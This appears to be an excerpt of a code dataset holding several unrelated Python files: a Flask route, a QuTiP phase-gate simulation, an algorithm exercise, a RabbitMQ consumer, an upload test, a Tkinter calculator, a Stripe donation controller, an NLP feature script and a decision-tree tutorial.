response\n\t\n@app.route('/students/update', methods = ['POST'])\ndef update():\n\n args = request.get_json()\n\n check = validate(args['name'],args['mark'])\n if check['isValid']:\n result = update_student(args['id'],args['name'],args['mark'])\n else:\n result = check\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n \n return response\n\t\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27583160","text":"\r\nfrom qutip import *\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Evolution(run_again = False):\r\n qubit_level = 3\r\n i=qeye(qubit_level)\r\n g,e = 
basis(qubit_level,0),basis(qubit_level,1)\r\n    gd,ed = g.dag(),e.dag()\r\n\r\n    if qubit_level >= 3:\r\n        f = basis(qubit_level,2)\r\n\r\n    a,ad = destroy(qubit_level) ,create(qubit_level)\r\n    # Sx = a+ad\r\n    # Sy = (ad - a)*1j\r\n    # Sz = i - 2 * ad*a\r\n\r\n    Sx = g*ed + e*gd\r\n    Sy = 1j * (e*gd - g*ed)\r\n    Sz = g*gd - e*ed\r\n\r\n    omega0 = 2 * np.pi * 20\r\n    Delta0=omega0\r\n    T0= 0.04\r\n    T= 4*T0\r\n    N = 1* np.pi / 2\r\n\r\n    gamma = np.pi-N\r\n    k=1\r\n    phase=0\r\n\r\n\r\n    def Sign(t):\r\n        res = 1.0 * (0 * T0 <= t <= T0) - 1.0 * (T0 < t <= 2 * T0) + \\\r\n              1.0 * (2 * T0 < t <= 3 * T0) - 1.0 * (3 * T0 < t <= 4 * T0)\r\n        return res\r\n\r\n    def Omega_rabi(t):\r\n        tt = np.pi * t / (2 * T0)\r\n        a0 = 4 * omega0 ** 2 * np.sin(tt)** 4\r\n        a1 = Delta0**2 * np.pi**2 * omega0**2 * np.cos(tt)**2 * np.sin(tt)**2\r\n        a2 = T0**2 * (Delta0 ** 2 * np.cos(tt) ** 4 + omega0 ** 2 * np.sin(tt) ** 4)**2\r\n        #print(a0,a1,a2)\r\n        res = np.abs(a0 + a1 / a2)\r\n        #print(res)\r\n        return np.sqrt(res)\r\n\r\n    def Phase(t):\r\n        tt = np.pi * t / (2 * T0)\r\n        b0 = Delta0 * np.pi * np.cos(tt)\r\n        b1 = 2 * T0 * omega0 ** 2 * np.sin(tt) ** 5\r\n        b2 = 2 * Delta0 ** 2 * T0 * np.cos(tt)**4 * np.sin(tt)\r\n        Phi0 = np.arctan(b0 / (b1 + b2))\r\n        Phi = Phi0 * (0 <= t <= T0) - Phi0 * (T0 < t <= 2 * T0) + (Phi0 + N) * (2 * T0 < t <= 3 * T0) + (N - Phi0) * (\r\n                    3 * T0 < t <= 4 * T0)\r\n        return Phi\r\n\r\n    def Omega_p(t):\r\n        return Omega_rabi(t) * np.exp(-1j * Phase(t))\r\n\r\n    def pulse_sx(t,args=None):\r\n        return Omega_rabi(t) * np.cos(Phase(t))\r\n\r\n    def pulse_sy(t,args=None):\r\n        return Omega_rabi(t) * np.sin(Phase(t))\r\n\r\n    def Delta(t,args=None):\r\n        return Delta0 * (1 + np.cos(np.pi * t / T0)) * Sign(t)\r\n\r\n\r\n\r\n    def Hami():\r\n        return [[0.5*Sz,Delta],[0.5*Sx, pulse_sx],[0.5*Sy, pulse_sy]]\r\n\r\n    def Hami_time(t):\r\n        return 0.5*(Sz * Delta(t) + Sx * pulse_sx(t) + Sy * pulse_sy(t))\r\n\r\n    Psi = (e).unit()\r\n    time_interval = T / 1000\r\n    tlist = np.arange(time_interval,T,time_interval)\r\n\r\n    if run_again:\r\n        res= mesolve(Hami(),Psi,tlist)\r\n        qsave(res, 'res')\r\n    else:\r\n        res = qload('res')\r\n\r\n    states = res.states\r\n\r\n    # dynamical phases\r\n    phaselist = np.zeros((len(tlist)), dtype=complex)\r\n    phase_d = 0\r\n    for idx,t in enumerate(tlist):\r\n        phase_d=phase_d + (states[idx].dag()*Hami_time(t)*states[idx]).tr() * time_interval\r\n        phaselist[idx] = phase_d\r\n\r\n\r\n    fig = plt.figure()\r\n    ax = fig.add_subplot(1,2,1)\r\n\r\n    color = ['b','r','g']\r\n    for i in range(qubit_level):\r\n        if i < len(color):\r\n            color_this = color[i]\r\n        else:\r\n            color_this = None\r\n        ax.plot(tlist/T,expect(basis(qubit_level,i)*basis(qubit_level,i).dag(),states),color = color_this,\r\n                label = str(i) )\r\n    ax.set_xlabel(r'$t/T$')\r\n\r\n    ax.legend()\r\n\r\n    ax = fig.add_subplot(1, 2, 2)\r\n    ax.plot(tlist/T,np.real(phaselist)/np.pi,label = 'real')\r\n    # ax.plot(tlist/T, np.imag(phaselist)/np.pi,label = 'imag')\r\n    ax.set_xlabel(r'$t/T$')\r\n    ax.set_ylabel(r'$rad/\\pi$')\r\n\r\n    ax.legend()\r\n    fig.tight_layout()\r\n\r\n    return\r\n\r\n\r\nif __name__ == '__main__':\r\n    Evolution(run_again=True)\r\n    plt.show()","sub_path":"twoQgate/LBJ_PhaseGate.py","file_name":"LBJ_PhaseGate.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"134625746","text":"def selectionSort(arr, cnt):\n    for i in range(cnt - 1):\n        min = i\n        for j in range(i+1, cnt):\n            x = arr[min][0] * arr[min][1]\n            y = arr[j][0] * arr[j][1]\n            if x > y:\n                min = j\n            elif x == y and 
arr[min][0] > arr[j][0]:\n                min = j\n        arr[i], arr[min] = arr[min], arr[i]\n\n\ndef get_submatrix(x, y):\n    global submatrix, subcnt\n    i = 0\n    while data[x+i][y]:\n        j = 0\n        while data[x+i][y+j]:\n            data[x+i][y+j] = 0\n            j += 1\n        i += 1\n    submatrix.append((i, j)) #store (height, width) as a tuple\n\n\nimport sys\nsys.stdin = open(\"(1258)행렬찾기_input.txt\",\"r\")\nT = int(input())\nfor tc in range(T):\n    N = int(input())\n    data = [list(map(int, input().split())) for _ in range(N)]\n    submatrix = []\n\n    # subcnt = 0\n    for i in range(N):\n        for j in range(N):\n            if data[i][j]:\n                get_submatrix(i, j)\n\n    submatrix.sort(key=lambda a:(a[0]*a[1], a[0]))\n\n    print(f\"#{tc+1} {len(submatrix)}\", end=\" \")\n    for x, y in submatrix:\n        print(f\"{x} {y}\", end=\" \")\n    print()\n","sub_path":"algorithm/day11/day11-A/(1258)행렬찾기2.py","file_name":"(1258)행렬찾기2.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"434401174","text":"'''Consumer'''\nimport pika\n### set up connection, channel, queue ###\n# connect to the rabbitmq server\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n# create a channel\nchannel = connection.channel()\nchannel.queue_declare(queue='hello') # declare the queue again: use the 'hello' queue if it already exists, otherwise create it\n\n### define the callback, i.e. what to do once a message arrives ###\ndef callback(ch, method, properties, body):\n    '''\n\n    :param ch: address of the sender channel's in-memory object\n    :param method: information about whom the sender addressed, i.e. which queue; rarely used\n    :param properties: the sender's properties, passed from the sender to the receiver\n    :param body: the message sent by the sender\n    :return: None\n    '''\n    print(\"--> ch\",ch, \"method:\",method, \"properties\",properties)\n    print('[x] Received %r' %body)\n\n### set up the consumer ###\nchannel.basic_consume(# what to consume\n                      on_message_callback=callback, # when a message arrives, call callback to handle it\n                      queue='hello', # name of the queue\n                      auto_ack=True) # after receiving a message, the consumer acknowledges 'received' back to RabbitMQ\nprint(\"[*] Waiting for messages. 
To exit press CTRL+C\")\n# once started, start_consuming runs forever: it does not stop at one message but keeps consuming, and simply blocks here when there is none\nchannel.start_consuming()\n","sub_path":"rabbitmq/MQ_Consumer.py","file_name":"MQ_Consumer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"625640907","text":"'''\nAuthor: Marcos Felipe da Silva\nVersion: 1.0\n\nDescription: Tests changing a user avatar\n\n'''\n\nimport unittest, json\nfrom requests import Session\n\nclass TestAlterarAvatar(unittest.TestCase):\n\n    def __init__(self, *args, **kargs):\n        super(TestAlterarAvatar, self).__init__(*args, **kargs)\n        self._host = 'http://localhost:8585'\n        self._c = Session()\n        self._uid = '4XhUhmpdVOb1N4OH9i4ZC5kfZVP2'\n        self._url = '/alterar_avatar'\n    \n    def setUp(self):\n        self._c.get(self._host+'/validar_autenticacao/'+self._uid)\n    \n    def tearDown(self):\n        self._c.get(self._host+'/logout')\n    \n    def test_a_usuario_nao_autenticado(self):\n        self._c.get(self._host+'/logout')\n        files = {'arquivo': open('sem_foto.png', 'rb')}\n        dados = {'dimensoes': [ [64,64], [480,640] ]}\n        resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n        print(resp)\n        self.assertIn('erro', resp.keys())\n    \n    def test_b_arquivo_vazio(self):\n        files = {}\n        dados = {'dimensoes': [ [64,64], [480,640] ]}\n        resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n        print(resp)\n        self.assertIn('erro', resp.keys())\n    \n    def test_c_arquivo_enviado(self):\n        files = {'arquivo': open('sem_foto.png', 'rb')}\n        dados = {'dimensoes':json.dumps([ [64,64], [480,640] ])}\n        resp = self._c.post(self._host+self._url, files = files, data = dados).json()\n        print(resp)\n        self.assertIn('original', resp.keys())\n\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"__testes__/index/test_alterar_avatar.py","file_name":"test_alterar_avatar.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"375956876","text":"import pandas as pd\nfrom Tkinter import *\nfrom tkMessageBox import showinfo\n\n\ndef valor_alvo(val_ini,qt,tx,ct=12.0):\n    val_ini = qt * val_ini\n    val_exp = val_ini*(1+tx)\n    val_exp = val_exp+(ct*2)\n    val_exp = val_exp/qt\n    return val_exp\n    \n\nclass GuiApp(object):\n    def __init__(self, master):\n        self.master = master\n        self.master.title(\"Get Valor Futuro\")\n        self.master.focus_force()\n        \n        # labels\n        \n        Label(master, text=\"Valor\").grid(row=0,column=0,sticky=W,padx=10)\n        Label(master, text=\"Qtde\").grid(row=1,column=0,sticky=W,padx=10)\n        Label(master, text=\"TIR (%)\").grid(row=2,column=0,sticky=W,padx=10)\n        \n        # entrys\n        \n        self.entry_valor_ini = Entry(master,width=10)\n        self.entry_valor_ini.grid(column=1,row=0,sticky=W,padx=10)\n        \n        self.entry_qtde = Entry(master,width=10)\n        self.entry_qtde.grid(column=1,row=1,sticky=W,padx=10)\n        \n        self.entry_tir = Entry(master,width=10)\n        self.entry_tir.grid(column=1,row=2,sticky=W,padx=10)\n        \n        # buttons\n\n        self.cancel_button = Button(master, text=\"Cancel\", command=self.cancel,width=10)\n        self.cancel_button.grid(column=0,row=3)\n        \n        self.run_button = Button(master, text=\"Run\", command=self.run,width=10)\n        self.run_button.grid(column=1,row=3)\n        \n    def cancel(self):\n        self.master.destroy()\n        \n    def run(self):\n        \n        # capture entrys values\n        \n        valor_inicial = float(self.entry_valor_ini.get().replace(',','.'))\n        quantidade = float(self.entry_qtde.get().replace(',','.'))\n        tir = 
float(self.entry_tir.get().replace(',','.'))/100\n \n result = valor_alvo(valor_inicial,quantidade,tir)\n result_str = 'Venda sugerida no valor:\\n{:.2f}'.format(result).replace(\".\",',')\n \n showinfo('SUCESS',result_str)\n \n def start(self):\n self.master.mainloop()\n \n# parte de inicializacao do programa (nao mexer)\n\ndef main():\n\n\tmaster = Tk()\n\tapp = GuiApp(master)\n\tapp.start()\n\n\texit()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"App_v.01.py","file_name":"App_v.01.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"459676370","text":"# donate/controllers.py\n# Brought to you by We Vote. Be good.\n\n# -*- coding: UTF-8 -*-\n\nfrom config.base import get_environment_variable\nfrom datetime import datetime\nfrom donate.models import DonationManager\nimport stripe\nfrom wevote_functions.functions import get_ip_from_headers, positive_value_exists\n\nstripe.api_key = get_environment_variable(\"STRIPE_SECRET_KEY\")\n\n\n# TODO set up currency option in webapp\ndef donation_with_stripe_for_api(request, token, email, donation_amount, monthly_donation, voter_we_vote_id):\n\n donation_manager = DonationManager()\n success = False\n saved_stripe_donation = False\n donation_entry_saved = False\n donation_date_time = datetime.today()\n donation_status = 'STRIPE_DONATION_NOT_COMPLETED'\n action_taken = 'VOTER_SUBMITTED_DONATION'\n action_taken_date_time = donation_date_time\n charge_id = ''\n amount = 0\n currency = ''\n stripe_customer_id = ''\n subscription_saved = 'NOT_APPLICABLE'\n status = ''\n charge_processed_successfully = bool\n error_text_description = ''\n error_message = ''\n one_time_donation = True\n subscription_id = ''\n funding = ''\n livemode = False\n created = 0\n failure_code = ''\n failure_message = ''\n network_status = ''\n reason = ''\n seller_message = ''\n stripe_type = ''\n paid = ''\n amount_refunded = 0\n refund_count = 0\n name = ''\n address_zip = ''\n brand = ''\n country = ''\n exp_month = ''\n exp_year = ''\n last4 = ''\n id_card = ''\n stripe_object = ''\n stripe_status = ''\n\n ip_address = get_ip_from_headers(request)\n\n if not positive_value_exists(ip_address):\n ip_address = ''\n\n if not positive_value_exists(voter_we_vote_id):\n status += \"DONATION_WITH_STRIPE_VOTER_WE_VOTE_ID_MISSING \"\n error_results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved\n\n }\n\n return error_results\n\n if not positive_value_exists(email):\n status += \"DONATION_WITH_STRIPE_EMAIL_MISSING \"\n error_results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved\n\n }\n\n return error_results\n\n try:\n results = donation_manager.retrieve_stripe_customer_id(voter_we_vote_id)\n if results['success']:\n stripe_customer_id = results['stripe_customer_id']\n status += \"STRIPE_CUSTOMER_ID_ALREADY_EXISTS \"\n else:\n customer = stripe.Customer.create(\n source=token,\n email=email\n )\n stripe_customer_id = customer.id\n saved_results = donation_manager.create_donate_link_to_voter(stripe_customer_id, 
voter_we_vote_id)\n status += saved_results['status']\n\n if positive_value_exists(stripe_customer_id):\n if positive_value_exists(monthly_donation):\n recurring_donation = donation_manager.create_recurring_donation(stripe_customer_id, voter_we_vote_id,\n donation_amount, donation_date_time)\n # recurring_donation_saved = recurring_donation['recurring_donation_plan_id']\n # recurring_donation_saved = recurring_donation['status']\n subscription_saved = recurring_donation['voter_subscription_saved']\n status += recurring_donation['status']\n success = recurring_donation['success']\n one_time_donation = False\n subscription_id = recurring_donation['subscription_id']\n charge_processed_successfully = recurring_donation['success']\n # TODO April 2017: Following lines were not being executed if recurring, but what we want to do is make\n # record, and make a charge record for the first payment.\n # Previous 3 code lines will do nothing, need to rethink\n\n charge = stripe.Charge.create(\n amount=donation_amount,\n currency=\"usd\",\n customer=stripe_customer_id\n )\n status = 'STRIPE_CHARGE_SUCCESSFUL'\n charge_id = charge.id\n success = positive_value_exists(charge_id)\n\n if positive_value_exists(charge_id):\n saved_donation = donation_manager.create_donation_from_voter(stripe_customer_id, voter_we_vote_id,\n donation_amount, email,\n donation_date_time, charge_id,\n charge_processed_successfully)\n saved_stripe_donation = saved_donation['success']\n donation_status = saved_donation['status'] + ' DONATION_PROCESSED_SUCCESSFULLY '\n stripe_detail = stripe.Charge.retrieve(charge_id)\n amount = stripe_detail['amount']\n currency = stripe_detail['currency']\n amount_refunded = stripe_detail['amount_refunded']\n funding = stripe_detail['source']['funding']\n livemode = stripe_detail['livemode']\n utc_dt = datetime.utcfromtimestamp(stripe_detail['created'])\n created = utc_dt.isoformat()\n failure_code = str(stripe_detail['failure_code'])\n failure_message = str(stripe_detail['failure_message'])\n network_status = stripe_detail['outcome']['network_status']\n reason = str(stripe_detail['outcome']['reason'])\n seller_message = stripe_detail['outcome']['seller_message']\n stripe_type = stripe_detail['outcome']['type']\n paid = str(stripe_detail['paid'])\n amount_refunded = stripe_detail['amount_refunded']\n refund_count = stripe_detail['refunds']['total_count']\n name = stripe_detail['source']['name']\n address_zip = stripe_detail['source']['address_zip']\n brand = stripe_detail['source']['brand']\n country = stripe_detail['source']['country']\n exp_month = stripe_detail['source']['exp_month']\n exp_year = stripe_detail['source']['exp_year']\n last4 = int(stripe_detail['source']['last4'])\n id_card = stripe_detail['source']['id']\n stripe_object = stripe_detail['source']['object']\n stripe_status = stripe_detail['status']\n\n except stripe.error.CardError as e:\n body = e.json_body\n error_from_json = body['error']\n donation_status = \" STRIPE_STATUS_IS: {http_status} STRIPE_CARD_ERROR_IS: {error_type} \" \\\n \"STRIPE_MESSAGE_IS: {error_message} \" \\\n \"\".format(http_status=e.http_status, error_type=error_from_json['type'],\n error_message=error_from_json['message'])\n status += donation_status\n error_message = translate_stripe_error_to_voter_explanation_text(e.http_status, error_from_json['type'])\n error_text_description = donation_status\n except stripe.error.StripeError as e:\n body = e.json_body\n error_from_json = body['error']\n donation_status = \" STRIPE_STATUS_IS: {http_status} 
STRIPE_ERROR_IS: {error_type} \" \\\n \"STRIPE_MESSAGE_IS: {error_message} \" \\\n \"\".format(http_status=e.http_status, error_type=error_from_json['type'],\n error_message=error_from_json['message'])\n status += donation_status\n error_message = translate_stripe_error_to_voter_explanation_text(e.http_status, error_from_json['type'])\n error_text_description = donation_status\n print(donation_status)\n except Exception:\n # Something else happened, completely unrelated to Stripe\n donation_status = \"A_NON_STRIPE_ERROR_OCCURRED \"\n status += donation_status\n error_message = 'Your payment was unsuccessful. Please try again later.'\n\n result_taken = donation_status # TODO: Update this to match \"action_result\" below\n action_result = donation_status # TODO: Update this to match \"action_result\" below\n result_taken_date_time = donation_date_time\n\n # steve: These are good, will need to be expanded when webhooks are setup, to indicate recurring payments etc\n # action_taken should be VOTER_SUBMITTED_DONATION, VOTER_CANCELED_DONATION or CANCEL_REQUEST_SUBMITTED\n # action_result should be CANCEL_REQUEST_FAILED, CANCEL_REQUEST_SUCCEEDED or DONATION_PROCESSED_SUCCESSFULLY\n donation_log_results = donation_manager.create_donation_log_entry(\n ip_address, stripe_customer_id, voter_we_vote_id, charge_id, action_taken, action_taken_date_time,\n result_taken, result_taken_date_time, error_text_description, error_message)\n\n donation_history_results = donation_manager.create_donation_history_entry(\n ip_address, stripe_customer_id, voter_we_vote_id, charge_id, amount, currency, one_time_donation,\n subscription_id, funding, livemode, action_taken, action_result, created, failure_code, failure_message,\n network_status, reason, seller_message, stripe_type, paid, amount_refunded, refund_count, name, address_zip,\n brand, country, exp_month, exp_year, last4, id_card, stripe_object, stripe_status, status)\n\n donation_entry_saved = donation_log_results['success']\n\n results = {\n 'status': status,\n 'success': success,\n 'charge_id': charge_id,\n 'customer_id': stripe_customer_id,\n 'donation_entry_saved': donation_entry_saved,\n 'saved_stripe_donation': saved_stripe_donation,\n 'monthly_donation': monthly_donation,\n 'subscription': subscription_saved,\n 'error_message_for_voter': error_message\n }\n\n return results\n\n\ndef translate_stripe_error_to_voter_explanation_text(donation_http_status, error_type):\n donation_manager = DonationManager()\n generic_voter_error_message = 'Your payment was unsuccessful. 
Please try again later.'\n\n if donation_http_status == 402:\n error_message_for_voter = donation_manager.retrieve_stripe_card_error_message(error_type)\n else:\n error_message_for_voter = generic_voter_error_message\n\n return error_message_for_voter\n\n\n# Get a list of all prior donations by the voter that is associated with this voter_we_vote_id\n# If they donated without logging in they are out of luck for tracking past donations\ndef donation_history_for_a_voter(voter_we_vote_id):\n donation_manager = DonationManager()\n donation_list = donation_manager.retrieve_donation_history_list(voter_we_vote_id)\n\n simple_donation_list = []\n for donation_row in donation_list['voters_donation_list']:\n row = donation_row\n json_data = {\n 'created': str(row[0].isoformat()),\n 'amount': row[1],\n 'currency': row[2],\n 'one_time_donation': row[3],\n 'brand': row[4],\n 'exp_month': row[5],\n 'exp_year': row[6],\n 'last4': row[7],\n 'stripe_status': row[8],\n 'charge_id': row[9]\n }\n\n simple_donation_list.append(json_data)\n\n return simple_donation_list\n","sub_path":"donate/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483777041","text":"import os\nimport numpy as np\nimport csv\nimport nltk\nimport re\n\n\n# Tokenizers\n\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n\ndef get_words(data):\n\treturn word_tokenize(data)\n\ndef get_sentences(data):\n\treturn sent_tokenize(data)\n\n# Direct data based features\n\ndef title_length(data):\n\tchars = len(data.split())\n\treturn chars, len(data)\n\ndef article_length(data):\n\treturn len(data)\n\n# Word token based features\n\ndef get_tags(tokens):\n\treturn nltk.pos_tag(tokens)\n\ndef ttr(tokens):\n\ttypes = sorted(set(tokens))\n\tif len(tokens) != 0: # Sort all tokens to get number of unique words\n\t\treturn len(types)/len(tokens)\n\treturn 0\n\ndef longest_word_lengths(tokens, num=2):\n\tlengths = [len(token) for token in tokens]\n\tlengths.sort(reverse=True)\n\treturn lengths[:num]\n\ndef zipf(tokens):\n\tfrom nltk import FreqDist # For frequenct distribution\n\tp = FreqDist(tokens) # Finding frequency distribution of the tokens found above\n\tfreq = list(p.values())\n\n\tfreq.sort(reverse=True) # Sort freq reverse to get ranked values\n\n\tf = np.array(freq)\n\tr = np.arange(1, len(f)+1)\n\n\tk = np.median(f*r)\n\treturn k\n\ndef heap(tokens):\n\tunique = []\n\n\twords = []\n\tvocab = []\n\n\tcurr_word = 0\n\tcurr_uniq = 0\n\n\tfor token in tokens:\n\t\tcurr_word = curr_word + 1\n\t\tif token not in unique:\n\t\t\tunique.append(token)\n\t\t\tcurr_uniq = curr_uniq + 1\n\t\n\t\tvocab.append(curr_uniq)\n\t\twords.append(curr_word)\n\n\tV = np.array(vocab)\n\tN = np.array(words)\n\n\t# Using Least Squares Method, the above line has slope and intercept as follows\n\n\tn = np.log(N)\n\tv = np.log(V)\n\n\tk = (((np.mean(n)*np.mean(v)) - np.mean(n*v)) / ((np.mean(n)*np.mean(n)) - np.mean(n*n)))\n\t \n\tb = np.mean(v) - k*np.mean(n)\n\n\treturn k, b\n\n\n\n# Sentence token based features\n\ndef get_sent_lengths(sents):\n\tlengths = [len(sent) for sent in sents]\n\tlengths.sort(reverse=True)\n\treturn lengths\n\ndef longest_sent_lengths(sents):\n\tlengths = get_sent_lengths(sents)\n\treturn lengths[:2]\n\ndef avg_sent_length(sents):\n\tlengths = get_sent_lengths(sents)\n\tif len(lengths) == 0:\n\t\treturn 0\n\treturn sum(lengths)/len(lengths)\n\n\nfrom nltk.data import load\ntagdict = 
load('help/tagsets/upenn_tagset.pickle')\n\n\nTW = \"/home/manas/Semester VII/Natural Language Processing/16110031_local.csv\"\nLI = \"/home/manas/Semester VII/Natural Language Processing/Project/Data Extraction/Links/3D Printing in Medicine.csv\"\nCA = \"/home/manas/Semester VII/Natural Language Processing/Project/Cancer.csv\"\n\nwith open(LI,\"r\") as f:\n\t# for row in f:\n\t# \ts = row\n\t# \tprint(s)\n\t# \tprint(\"\\n\")\n\treader=csv.reader(f)\n\tfor idx, row in enumerate(reader):\n\t\t# print(row[1]),\n\t\t# print(nltk.pos_tag(row[1].split(\" \")))\n\t\tif idx==0:\n\t\t\tcontinue\n\n\t\tdata = re.sub(r'[^A-Za-z0-9. ]+', ' ', row[1])\n\t\tdata = \" \".join(data.split())\n\n\t\twords = get_words(data)\n\t\tsentences = get_sentences(data)\n\n\t\ttags = get_tags(words)\n\t\tprint(idx, data[:20]) \n\t\t\n\t\t# print()\n\n\t\t\n\t\t\n\t\tkeys = list(tagdict.keys())\n\t\tkeys.sort()\n\n\t\tdist = {}\n\n\t\tfor k in keys:\n\t\t\tdist[k] = 0\n\n\t\tfor tag in tags:\n\t\t\tdist[tag[1]] += 1\n\n\t\ttag_features = []\n\t\tfor k in keys:\n\t\t\ttag_features.append(dist[k])\n\n\t\tprint(tag_features)\n\t\t# possible_tags= set([tag[1] for tag in tags])\n\t\t# for tag in possible_tags:\n\t\t# \ttry:\n\t\t# \t\tdist[tag] += 1\n\t\t# \texcept:\n\t\t# \t\tdist[tag] = 1\n\n\t\t# print(dist)\n\t\thead = [\"Number of Tokens\",\"Article Length\", \"TTR\", \"longest_word_lengths\", \"Zipf\", \"heap\", \"longest_sent_lengths\", \"avg_sent_length\" ]\n\t\tvalues = [len(words), article_length(data), ttr(words), longest_word_lengths(words), zipf(words), heap(words), longest_sent_lengths(sentences), avg_sent_length(sentences)]\n\n\t\tfor i in range(len(head)):\n\t\t\tprint(head[i],\": \",values[i])\n\n\t\tprint()\n\n\t\t","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"140067190","text":"# -*- coding: UTF-8 -*-\nfrom math import log\nimport operator\n\n\"\"\"\nFunction: compute the empirical (Shannon) entropy of the given data set\n\nParameters:\n\tdataSet - the data set\nReturns:\n\tshannonEnt - the empirical (Shannon) entropy\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef calcShannonEnt(dataSet):\n\tnumEntires = len(dataSet) #number of rows in the data set\n\tlabelCounts = {} #dict that counts occurrences of each label\n\tfor featVec in dataSet: #tally every feature vector\n\t\tcurrentLabel = featVec[-1] #extract the label\n\t\tif currentLabel not in labelCounts.keys(): #if the label is not in the count dict yet, add it\n\t\t\tlabelCounts[currentLabel] = 0\n\t\tlabelCounts[currentLabel] += 1 #count the label\n\tshannonEnt = 0.0 #empirical (Shannon) entropy\n\tfor key in labelCounts: #compute the Shannon entropy\n\t\tprob = float(labelCounts[key]) / numEntires #probability of this label\n\t\tshannonEnt -= prob * log(prob, 2) #apply the entropy formula\n\treturn shannonEnt #return the empirical (Shannon) entropy\n\n\"\"\"\nFunction: create the test data set\n\nParameters:\n\tnone\nReturns:\n\tdataSet - the data set\n\tlabels - the feature labels\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-20\n\"\"\"\ndef createDataSet():\n\tdataSet = [[0, 0, 0, 0, 'no'], #the data set\n\t\t\t[0, 0, 0, 1, 'no'],\n\t\t\t[0, 1, 0, 1, 'yes'],\n\t\t\t[0, 1, 1, 0, 'yes'],\n\t\t\t[0, 0, 0, 0, 'no'],\n\t\t\t[1, 0, 0, 0, 'no'],\n\t\t\t[1, 0, 0, 1, 'no'],\n\t\t\t[1, 1, 1, 1, 'yes'],\n\t\t\t[1, 0, 1, 2, 'yes'],\n\t\t\t[1, 0, 1, 2, 'yes'],\n\t\t\t[2, 0, 1, 2, 'yes'],\n\t\t\t[2, 0, 1, 1, 'yes'],\n\t\t\t[2, 1, 0, 1, 'yes'],\n\t\t\t[2, 1, 0, 2, 'yes'],\n\t\t\t[2, 0, 0, 0, 'no']]\n\tlabels = ['年龄', '有工作', '有自己的房子', '信贷情况'] #feature labels: age, has a job, owns a house, credit rating\n\treturn dataSet, labels #return the data set and class labels\n\n\"\"\"\nFunction: split the data set on a given feature\n\nParameters:\n\tdataSet - 
the data set to be split\n\taxis - the feature to split on\n\tvalue - the feature value to keep\nReturns:\n\tretDataSet - the split subset\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef splitDataSet(dataSet, axis, value): \n\tretDataSet = [] #list for the returned subset\n\tfor featVec in dataSet: #iterate over the data set\n\t\tif featVec[axis] == value:\n\t\t\treducedFeatVec = featVec[:axis] #drop the axis feature\n\t\t\treducedFeatVec.extend(featVec[axis+1:]) #append matching rows to the returned subset\n\t\t\tretDataSet.append(reducedFeatVec)\n\tprint('retDataSet\\t', retDataSet)\n\treturn retDataSet #return the split subset\n\n\"\"\"\nFunction: choose the optimal feature\n\nParameters:\n\tdataSet - the data set\nReturns:\n\tbestFeature - index of the (optimal) feature with the largest information gain\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-20\n\"\"\"\ndef chooseBestFeatureToSplit(dataSet):\n\tnumFeatures = len(dataSet[0]) - 1 #number of features\n\tbaseEntropy = calcShannonEnt(dataSet) #Shannon entropy of the data set\n\tbestInfoGain = 0.0 #information gain\n\tbestFeature = -1 #index of the optimal feature\n\tfor i in range(numFeatures): #iterate over all features\n\t\t#collect the i-th feature of every sample in dataSet\n\t\tfeatList = [example[i] for example in dataSet]\n\t\tuniqueVals = set(featList) #build a set {}, so elements are unique\n\t\tnewEntropy = 0.0 #empirical conditional entropy\n\t\tfor value in uniqueVals: #compute the information gain\n\t\t\tsubDataSet = splitDataSet(dataSet, i, value) #subDataSet is the subset after splitting\n\t\t\tprob = len(subDataSet) / float(len(dataSet)) #probability (weight) of the subset\n\t\t\tnewEntropy += prob * calcShannonEnt(subDataSet) #accumulate the empirical conditional entropy\n\t\tinfoGain = baseEntropy - newEntropy #information gain\n\t\t# print(\"info gain of feature %d: %.3f\" % (i, infoGain)) #print each feature's information gain\n\t\tif (infoGain > bestInfoGain): #compare information gains\n\t\t\tbestInfoGain = infoGain #update the largest information 